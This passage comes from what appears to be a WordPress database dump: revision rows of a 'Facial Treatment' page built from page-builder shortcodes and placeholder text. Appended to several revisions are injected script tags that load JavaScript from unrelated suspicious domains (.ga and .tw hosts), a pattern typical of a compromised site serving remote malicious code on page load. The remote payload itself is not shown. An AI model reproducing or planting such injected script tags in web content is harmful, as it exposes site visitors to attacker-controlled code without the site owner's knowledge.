offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:01:37','2018-01-11 01:01:37','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6628,1,'2018-01-11 01:01:52','2018-01-11 01:01:52','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 01:01:52','2018-01-11 01:01:52','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6629,1,'2018-01-11 01:03:27','2018-01-11 01:03:27','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1515632507253{padding-top: 20px !important;padding-bottom: 20px !important;}\"]\r\n<h2>Facial Treatment</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"parallax_hover\" icon_family=\"iconsmind\" image_url=\"https://source.unsplash.com/featured/800x600/daily/?mountains\" color_scheme=\"dark\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" icon_iconsmind=\"iconsmind-Snow\" min_height=\"600\"]\r\n<h2>Exclusive Design</h2>\r\n<h5>Lorem Ipsum</h5>\r\n[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"parallax_hover\" icon_family=\"iconsmind\" image_url=\"https://source.unsplash.com/featured/800x600/daily/?girl\" color_scheme=\"dark\" secondary_content=\"\" icon_iconsmind=\"iconsmind-Drag-Down\" min_height=\"600\"]\r\n<h2>Visual Builder</h2>\r\n<h5>Lorem Ipsum</h5>\r\n[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"parallax_hover\" icon_family=\"iconsmind\" image_url=\"https://source.unsplash.com/featured/800x600/daily/?tech\" color_scheme=\"dark\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" link_url=\"#\" icon_iconsmind=\"iconsmind-Crown-2\" min_height=\"600\"]\r\n<h2>Powerful Tools</h2>\r\n<h5>Lorem Ipsum</h5>\r\n[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"parallax_hover\" icon_family=\"iconsmind\" image_url=\"https://source.unsplash.com/featured/800x600/daily/?view\" color_scheme=\"dark\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" link_url=\"#\" icon_iconsmind=\"iconsmind-Snow\" min_height=\"600\"]\r\n<h2>Quick Importer</h2>\r\n<h5>Lorem Ipsum</h5>\r\n[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"creative-services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h3>Striving to make the web a more beautiful place every single day</h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1504286255898{padding-right: 10% !important;}\"]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes.[/vc_column_text][nectar_btn size=\"large\" button_style=\"see-through-2\" color_override=\"#ff1053\" hover_color_override=\"#ff1053\" hover_text_color_override=\"#ffffff\" icon_family=\"default_arrow\" url=\"#explainer\" text=\"Learn More\" margin_top=\"15\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"2/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"none\" text_align=\"left\"][vc_column_inner column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color=\"#2ac4ea\" content_color=\"#ffffff\" box_color_opacity=\"0.6\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#http://google.com\" icon_iconsmind=\"iconsmind-Environmental-3\" css=\".vc_custom_1504285427120{margin-top: 50px !important;margin-bottom: 2em !important;padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" icon_size=\"40\"]\r\n<h4>Natural Flow</h4>\r\nSed cursus turpis vitae tortor donec eaque ipsa quaeab illo.[/fancy_box][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color_opacity=\"1\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#\" icon_iconsmind=\"iconsmind-Sun\" css=\".vc_custom_1504285795178{margin-bottom: 50px !important;padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" icon_size=\"40\"]\r\n<h4>Hot Looks</h4>\r\nNemo enim ipsam volup tatem quia vol uptas sit sunt in.[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color=\"#ff1053\" box_color_opacity=\"1\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#\" icon_iconsmind=\"iconsmind-Rock-andRoll\" css=\".vc_custom_1504285430965{margin-bottom: 2em !important;padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" delay=\"100\" icon_size=\"40\"]\r\n<h4>Awesome Design</h4>\r\nNam libero tempore, cum soluta nobis placeat facere.[/fancy_box][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color=\"#fbbc05\" box_color_opacity=\"1\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#\" icon_iconsmind=\"iconsmind-Atom\" delay=\"100\" css=\".vc_custom_1504286112774{padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" icon_size=\"40\"]\r\n<h4>Unrivaled Quality</h4>\r\nAt vero eos et lorem accusamus et iusto ullam corporis.[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color=\"#2f88d6\" content_color=\"#ffffff\" box_color_opacity=\"1\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#\" icon_iconsmind=\"iconsmind-Motorcycle\" css=\".vc_custom_1504286068726{margin-top: 50px !important;margin-bottom: 2em !important;padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" delay=\"200\" icon_size=\"40\"]\r\n<h4>Visual Builder</h4>\r\nIpsum totam rem aperiam, eaque ipsa quae ab illo.[/fancy_box][fancy_box box_style=\"color_box_basic\" icon_family=\"iconsmind\" box_color=\"#34a853\" box_color_opacity=\"1\" box_alignment=\"left\" enable_animation=\"true\" animation=\"fade-in-from-bottom\" color_scheme=\"none\" secondary_content=\"here\'s some awesome text that would only be shown on hover\" min_height=\"0\" link_url=\"#\" icon_iconsmind=\"iconsmind-Folder-Organizing\" delay=\"200\" css=\".vc_custom_1504286089409{padding-top: 15% !important;padding-right: 15% !important;padding-bottom: 15% !important;padding-left: 15% !important;}\" icon_size=\"40\"]\r\n<h4>Ton of Features</h4>\r\nIncidunt ut labore et dolore magnam ali quam quaerat.[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script 